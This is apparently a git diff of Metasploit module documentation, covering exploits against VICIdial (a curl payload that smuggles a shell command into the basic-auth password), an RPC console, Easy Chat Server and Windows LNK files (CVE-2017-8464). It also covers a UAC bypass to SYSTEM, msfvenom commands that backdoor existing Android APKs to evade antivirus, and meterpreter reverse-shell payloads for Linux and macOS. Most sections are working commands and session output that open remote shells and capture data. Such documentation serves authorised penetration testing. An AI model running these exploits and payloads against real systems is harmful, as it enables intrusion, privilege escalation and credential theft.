msf exploit(msf_rpc_console) > set rhost 172.16.191.215
|
||||
rhost => 172.16.191.215
|
||||
msf exploit(msf_rpc_console) > set username msf
|
||||
username => msf
|
||||
msf exploit(msf_rpc_console) > set password abc123
|
||||
password => abc123
|
||||
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
|
||||
lhost => 172.16.191.181
|
||||
msf exploit(msf_rpc_console) > set target 2
|
||||
target => 2
|
||||
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
|
||||
payload => cmd/unix/reverse_python
|
||||
msf exploit(msf_rpc_console) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[+] 172.16.191.215:55552 - Authenticated successfully
|
||||
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
|
||||
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
|
||||
[*] 172.16.191.215:55552 - API version 1.0
|
||||
[+] 172.16.191.215:55552 - Created console #0
|
||||
[*] 172.16.191.215:55552 - Sending payload...
|
||||
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
|
@ -0,0 +1,133 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
|
||||
|
||||
When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
|
||||
|
||||
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.
|
||||
|
||||
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
|
||||
|
||||
Installers:
|
||||
|
||||
* [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
|
||||
* [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
|
||||
|
||||
Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
|
||||
|
||||
|
||||
## Technical Details
|
||||
|
||||
The `functions.php` file defines a function called `user_authorization`:
|
||||
|
||||
```php
|
||||
function user_authorization($user,$pass,$user_option,$user_update)
|
||||
```
|
||||
|
||||
This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
|
||||
|
||||
```php
|
||||
if ($SSpass_hash_enabled > 0)
|
||||
{
|
||||
if (file_exists("../agc/bp.pl"))
|
||||
{$pass_hash = exec("../agc/bp.pl --pass=$pass");}
|
||||
else
|
||||
{$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
|
||||
```
|
||||
|
||||
A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
|
||||
|
||||
```php
|
||||
$user = preg_replace("/\'|\"|\\\\|;/","",$user);
|
||||
$pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
|
||||
```
|
||||
|
||||
It is trivial to bypass the blacklist.
|
||||
|
||||
For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
|
||||
|
||||
For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
|
||||
|
||||
```php
|
||||
$PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
|
||||
$PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
|
||||
```
|
||||
|
||||
However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
|
||||
|
||||
* help.php
|
||||
* vicidial_sales_viewer.php
|
||||
|
||||
In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
|
||||
|
||||
* vicidial_sales_viewer.php
|
||||
|
||||
This vulnerability was patched in revision 2759.
|
||||
|
||||
|
||||
## Proof of Concept
|
||||
|
||||
```bash
|
||||
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
|
||||
--user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
|
||||
```
|
||||
|
||||
```bash
|
||||
$ curl -isk "https://VICIdial.local/vicidial/help.php" \
|
||||
--user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
|
||||
```
|
||||
|
||||
Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
|
||||
3. Do: `set rhost [IP]`
|
||||
4. Do: `run`
|
||||
5. You should get a session
|
||||
|
||||
|
||||
## Sample Output
|
||||
|
||||
```
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
|
||||
[*] 172.16.191.150:80 The target appears to be vulnerable.
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[*] 172.16.191.150:80 Sending payload (505 bytes)
|
||||
[+] 172.16.191.150:80 Payload sent successfully
|
||||
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
```
|
||||
|
||||
|
||||
## Sample Output (Verbose)
|
||||
|
||||
```
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
|
||||
|
||||
[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
|
||||
[*] 172.16.191.150:80 The target appears to be vulnerable.
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[*] 172.16.191.150:80 Sending payload (505 bytes)
|
||||
[+] 172.16.191.150:80 Payload sent successfully
|
||||
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
```
|
||||
|
|
@ -0,0 +1,109 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This vulnerability affects any Windows version without the patch for
|
||||
CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of
|
||||
this, the exploit DLL file needs to be on a local file system or an USB drive.
|
||||
A fix was released in the June 2017 Patch Tuesday.
|
||||
|
||||
## Vulnerable Setup
|
||||
|
||||
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
### Start a handler
|
||||
1. `use exploit/multi/handler`
|
||||
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
|
||||
3. `set LHOST [ip victim connects back to]`
|
||||
4. `exploit -j`
|
||||
5. `back`
|
||||
|
||||
### Run the exploit
|
||||
|
||||
1. `use exploit/windows/fileformat/cve_2017_8464_lnk_rce`
|
||||
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
|
||||
3. `set LHOST [ip victim connects back to]`
|
||||
4. `exploit`
|
||||
|
||||
### Copy files to USB drive & open on vulnerable system
|
||||
|
||||
1. `cp /root/.msf4/local/* [USB drive path]`
|
||||
2. Insert device in target machine and browse to it
|
||||
|
||||
## Options
|
||||
|
||||
**FILENAME**
|
||||
|
||||
The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.
|
||||
|
||||
**DLLNAME**
|
||||
|
||||
The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.
|
||||
|
||||
**DRIVE**
|
||||
|
||||
Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.
|
||||
|
||||
### Windows 10 x64 (Build 14393)
|
||||
|
||||
```
|
||||
msf > use exploit/multi/handler
|
||||
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||||
msf exploit(handler) > set LHOST 192.168.146.197
|
||||
LHOST => 192.168.146.197
|
||||
msf exploit(handler) > exploit -j
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.146.197:4444
|
||||
[*] Starting the payload handler...
|
||||
msf exploit(handler) > back
|
||||
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
|
||||
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => windows/x64/meterpreter/reverse_tcp
|
||||
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
|
||||
LHOST => 192.168.146.197
|
||||
msf exploit(cve_2017_8464_lnk_rce) > exploit
|
||||
|
||||
msf exploit(cve_2017_8464_lnk_rce) > exploit
|
||||
|
||||
[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
|
||||
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
|
||||
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
|
||||
msf exploit(cve_2017_8464_lnk_rce) >
|
||||
[*] Sending stage (1189423 bytes) to 192.168.146.193
|
||||
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
|
||||
sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-5G8HK7E
|
||||
OS : Windows 10 (Build 14393).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,53 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
|
||||
|
||||
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
|
||||
|
||||
This module has been tested successfully on
|
||||
|
||||
* Easy Chat Server 3.1 on Windows XP En SP3
|
||||
|
||||
Installers:
|
||||
|
||||
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploits/windows/http/easychatserver_seh`
|
||||
3. Do: `set rhosts [IP]`
|
||||
4. Do: `exploit`
|
||||
5. You should get your payload executed
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
marco@kali:~$ msfconsole -q
|
||||
msf > use exploit/windows/http/easychatserver_seh
|
||||
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
|
||||
RHOST => 192.168.56.101
|
||||
msf exploit(easychatserver_seh) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Sending stage (957487 bytes) to 192.168.56.101
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : MM-8B040C5B05D9
|
||||
OS : Windows XP (Build 2600, Service Pack 3).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
|
||||
msf exploit(easychatserver_seh) >
|
||||
```
|
|
@ -1,8 +1,8 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
|
||||
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
|
||||
|
||||
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
|
||||
This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
|
||||
|
||||
## Vulnerable Application
|
||||
|
|
@ -0,0 +1,115 @@
|
|||
## Intro
|
||||
|
||||
This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID
|
||||
that is located in the current user hive. This key contains a reference to a DLL that
|
||||
contains a chosen payload. Multiple COM vectors are defined in this module and one is
|
||||
chosen at random at runtime.
|
||||
|
||||
The module modifies the registry in order for this exploit to work. The modification is
|
||||
reverted once the exploitation attempt has finished.
|
||||
|
||||
This module requires that the payload architecture matches the target operating system
|
||||
architecture. This is due to the fact that the underlying binaries that are invoked
|
||||
match the system architecture.
|
||||
|
||||
If a custom DLL is to be used with `EXE::Custom`, that DLL must match the system
|
||||
architecture, and should call `ExitProcess()` after starting the payload in a
|
||||
different process.
|
||||
|
||||
## Usage
|
||||
|
||||
1. Create a session on the target system under the context of a local administrative user.
|
||||
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_comhijack`.
|
||||
1. Set the `PAYLOAD` and configure it correctly, making sure the architecture is correct.
|
||||
1. If an existing handler is configured to receive the elevated session, then the module's
|
||||
handler should be disabled: `set DisablePayloadHandler true`.
|
||||
1. Make sure that the `SESSION` value is set to the existing session identifier.
|
||||
1. Invoke the module: `run`.
|
||||
|
||||
## Scenario
|
||||
|
||||
```
|
||||
msf exploit(bypassuac_comhijack) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
|
||||
|
||||
msf exploit(bypassuac_comhijack) > sessions -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-5A73R51
|
||||
OS : Windows 10 (Build 14393).
|
||||
Architecture : x64
|
||||
System Language : en_AU
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
|
||||
meterpreter > getsystem
|
||||
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
|
||||
[-] Named Pipe Impersonation (In Memory/Admin)
|
||||
[-] Named Pipe Impersonation (Dropper/Admin)
|
||||
[-] Token Duplication (In Memory/Admin)
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(bypassuac_comhijack) > options
|
||||
|
||||
Module options (exploit/windows/local/bypassuac_comhijack):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (windows/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
LHOST xxx.xx.255.1 yes The listen address
|
||||
LPORT 8443 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic
|
||||
|
||||
|
||||
msf exploit(bypassuac_comhijack) > run
|
||||
|
||||
[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
|
||||
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
|
||||
[+] [2017.08.16-12:58:32] UAC is set to Default
|
||||
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
|
||||
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
|
||||
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
|
||||
[*] [2017.08.16-12:58:33] Executing high integrity process ...
|
||||
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
|
||||
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
|
||||
[*] [2017.08.16-12:58:38] Cleaining up registry ...
|
||||
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
|
||||
msf exploit(bypassuac_comhijack) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
|
||||
2 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)
|
||||
|
||||
msf exploit(bypassuac_comhijack) > sessions -1
|
||||
[*] Starting interaction with 2...
|
||||
|
||||
meterpreter > getsystem
|
||||
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
```
|
|
@ -47,6 +47,16 @@ To create the APK with msfvenom:
|
|||
./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
|
||||
```
|
||||
|
||||
You can also add Android meterpreter to any existing APK. This will make it harder for
|
||||
Anti-virus software to detect the payload, and allow you read internal files and take
|
||||
screenshots of the Android app you are backdooring:
|
||||
|
||||
|
||||
```
|
||||
./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
|
||||
```
|
||||
|
||||
|
||||
Next, start an Android device. Upload the APK, and execute it. There are different ways to do this,
|
||||
so please refer to the Scenarios section for more information.
|
||||
|
||||
|
|
|
@ -61,7 +61,7 @@ To use linux/x86/meterpreter/reverse_tcp as an executable, first you can generat
|
|||
./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f elf -o /tmp/payload.bin
|
||||
```
|
||||
|
||||
Before sending the exectauble to the victim machine, you need to set up the handler on your end:
|
||||
Before sending the executable to the victim machine, you need to set up the handler on your end:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/handler```
|
||||
|
@ -69,7 +69,7 @@ Before sending the exectauble to the victim machine, you need to set up the hand
|
|||
4. Do: ```set LHOST [Your IP]```
|
||||
5. Do: ```run```
|
||||
|
||||
And that should start the listener. When the victim runs the malicious exectauble, you should
|
||||
And that should start the listener. When the victim runs the malicious executable, you should
|
||||
receive a session:
|
||||
|
||||
```
|
||||
|
@ -143,7 +143,7 @@ interfaces on the remote machine.
|
|||
|
||||
**getuid**
|
||||
|
||||
The getuid command tells you the current user that Meterpreter is running on. For example:
|
||||
The ```getuid``` command tells you the current user that Meterpreter is running on. For example:
|
||||
|
||||
```
|
||||
meterpreter > getuid
|
||||
|
@ -166,7 +166,7 @@ The ```ps``` command lists the running processes on the remote machine.
|
|||
|
||||
**shell**
|
||||
|
||||
The shell command allows you to interact with the remote machine's terminal (or shell). For
|
||||
The ```shell``` command allows you to interact with the remote machine's terminal (or shell). For
|
||||
example:
|
||||
|
||||
```
|
||||
|
@ -180,7 +180,7 @@ If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
|
|||
|
||||
**sysinfo**
|
||||
|
||||
The sysinfo command shows you basic information about the remote machine. Such as:
|
||||
The ```sysinfo``` command shows you basic information about the remote machine. Such as:
|
||||
|
||||
* Computer name
|
||||
* OS name
|
||||
|
|
|
@ -0,0 +1,183 @@
|
|||
osx/x64/meterpreter_reverse_tcp is similar to the linux meterpreter, but built for OSX.
|
||||
It allows you to remotely take over the compromised system, having control of the file system,
|
||||
webcam, microphone, screenshot and collect sensitive information such as credentials
|
||||
using post modules, etc.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
osx/x64/meterpreter_reverse_tcp 64-bit MacOSX platforms from 10.8 onwards.
|
||||
|
||||
## Deploying osx/x64/meterpreter_reverse_tcp
|
||||
|
||||
To use osx/x64/meterpreter_reverse_tcp as an executable, first you can generate it with msfvenom:
|
||||
|
||||
```
|
||||
./msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=[IP] LPORT=4444 -f macho -o /tmp/payload.bin
|
||||
```
|
||||
|
||||
Before sending the executable to the victim machine, you need to set up the handler on your end:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/handler```
|
||||
3. Do: ```set PAYLOAD osx/x64/meterpreter_reverse_tcp```
|
||||
4. Do: ```set LHOST [Your IP]```
|
||||
5. Do: ```run```
|
||||
|
||||
And that should start the listener. When the victim runs the malicious executable, you should
|
||||
receive a session:
|
||||
|
||||
```
|
||||
msf exploit(handler) > run
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.23.1:4444
|
||||
msf exploit(handler) > [*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.182:45009) at 2017-08-08 12:34:49 +0800
|
||||
|
||||
msf exploit(handler) > sessions 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
|
||||
## Important Basic Commands
|
||||
|
||||
Here is a list of some of the common commands you might need while using Meterpreter:
|
||||
|
||||
**pwd**
|
||||
|
||||
The ```pwd``` command tells you the current working directory. For example:
|
||||
|
||||
```
|
||||
meterpreter > pwd
|
||||
/Users/User/Desktop
|
||||
```
|
||||
|
||||
**cd**
|
||||
|
||||
The ```cd``` command allows you to change directories. Example:
|
||||
|
||||
```
|
||||
meterpreter > cd /tmp
|
||||
```
|
||||
|
||||
**cat**
|
||||
|
||||
The ```cat``` command allows you to see the content of a file:
|
||||
|
||||
```
|
||||
meterpreter > cat /tmp/data.txt
|
||||
hello world
|
||||
```
|
||||
|
||||
**upload**
|
||||
|
||||
The ```upload``` command allows you to upload a file to the remote target. For example:
|
||||
|
||||
```
|
||||
meterpreter > upload /tmp/data.bin /Users/User/Desktop
|
||||
[*] uploading : /tmp/data.bin -> /Users/User/Desktop
|
||||
[*] uploaded : /tmp/data.bin -> /Users/User/Desktop/data.bin
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
**download**
|
||||
|
||||
The ```download``` command allows you to download a file from the remote target to your machine. For example:
|
||||
|
||||
```
|
||||
meterpreter > download /Users/User/Desktop/data.bin /tmp
|
||||
[*] downloading: /Users/User/Desktop/data.bin -> /tmp/data.bin
|
||||
[*] download : /Users/User/Desktop/data.bin -> /tmp/data.bin
|
||||
```
|
||||
|
||||
**ifconfig/ipconfig**
|
||||
|
||||
```ifconfig``` and ```ipconfig``` are actually the same thing. They allow you to see the network
|
||||
interfaces on the remote machine.
|
||||
|
||||
**getuid**
|
||||
|
||||
The ```getuid``` command tells you the current user that Meterpreter is running on. For example:
|
||||
|
||||
```
|
||||
meterpreter > getuid
|
||||
Server username: uid=502, gid=20, euid=502, egid=20
|
||||
```
|
||||
|
||||
**execute**
|
||||
|
||||
The ```execute``` command allows you to execute a command or file on the remote machine.
|
||||
For example:
|
||||
|
||||
```
|
||||
meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
|
||||
Process 5292 created.
|
||||
```
|
||||
|
||||
**ps**
|
||||
|
||||
The ```ps``` command lists the running processes on the remote machine.
|
||||
|
||||
**shell**
|
||||
|
||||
The ```shell``` command allows you to interact with the remote machine's terminal (or shell). For
|
||||
example:
|
||||
|
||||
```
|
||||
meterpreter > shell
|
||||
Process 29335 created.
|
||||
Channel 2 created.
|
||||
cat /tmp/hello.txt
|
||||
hello
|
||||
exit
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel or
|
||||
[CTRL]+[Z] then y (or the exit command) to terminate the channel.
|
||||
|
||||
**sysinfo**
|
||||
|
||||
The ```sysinfo``` command shows you basic information about the remote machine. Such as:
|
||||
|
||||
* Computer name
|
||||
* OS name
|
||||
* Architecture
|
||||
* Meterpreter type
|
||||
|
||||
For example:
|
||||
|
||||
```
|
||||
meterpreter > sysinfo
|
||||
Computer : My-Computer.local
|
||||
OS : Mac OS X Sierra (MacOSX 10.12.6)
|
||||
Architecture : x86
|
||||
Meterpreter : x64/osx
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
**Extensions**
|
||||
|
||||
OSX Meterpreter supports reading and writing to the clipboard with the extapi extension,
|
||||
you can load it with the ```load``` command:
|
||||
|
||||
```
|
||||
meterpreter > load extapi
|
||||
Loading extension extapi...Success.
|
||||
meterpreter > clipboard_get_data
|
||||
Text captured at
|
||||
=================
|
||||
pa$$w0rd
|
||||
=================
|
||||
```
|
||||
|
||||
**Other commands**
|
||||
|
||||
For a complete list of OSX Meterpreter commands, do the following at the prompt:
|
||||
|
||||
```
|
||||
meterpreter > help
|
||||
```
|
||||
|
||||
|
|
@ -154,7 +154,7 @@ Process 2076 created.
|
|||
To pass an argument, use the ```-a``` flag:
|
||||
|
||||
```
|
||||
meterpreter > execute -f iexplore.exe -a http://metasploit.com
|
||||
meterpreter > execute -f iexplore.exe -a https://metasploit.com
|
||||
Process 2016 created.
|
||||
```
|
||||
|
||||
|
|
|
@ -24,7 +24,11 @@ PIDs to ASCII.
|
|||
|
||||
**CLEAR_DTCS***
|
||||
|
||||
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Enginge Light)
|
||||
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Engine Light).
|
||||
|
||||
**PADDING**
|
||||
|
||||
Optional byte-value to use for padding all CAN bus packets to an 8-byte length. Padding is disabled by default.
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
|
|
@ -0,0 +1,76 @@
|
|||
## Indicators
|
||||
|
||||
There are several indicators that a process is being executed inside of a container. This module looks for the following indicators:
|
||||
|
||||
1. Presence of `/.dockerenv` file indicates Docker.
|
||||
2. Finding select strings in `/proc/1/cgroup` indicates LXC or Docker.
|
||||
3. The value of the `container` environment variable in `/proc/1/environ` indicates LXC or systemd nspawn.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Get a session via exploit of your choice
|
||||
3. `run post/linux/gather/checkcontainer`
|
||||
4. You should get feedback if a container was detected
|
||||
|
||||
## Options
|
||||
|
||||
**SESSION**
|
||||
|
||||
Which session to use, which can be viewed with `sessions -l`
|
||||
|
||||
## Scenarios
|
||||
|
||||
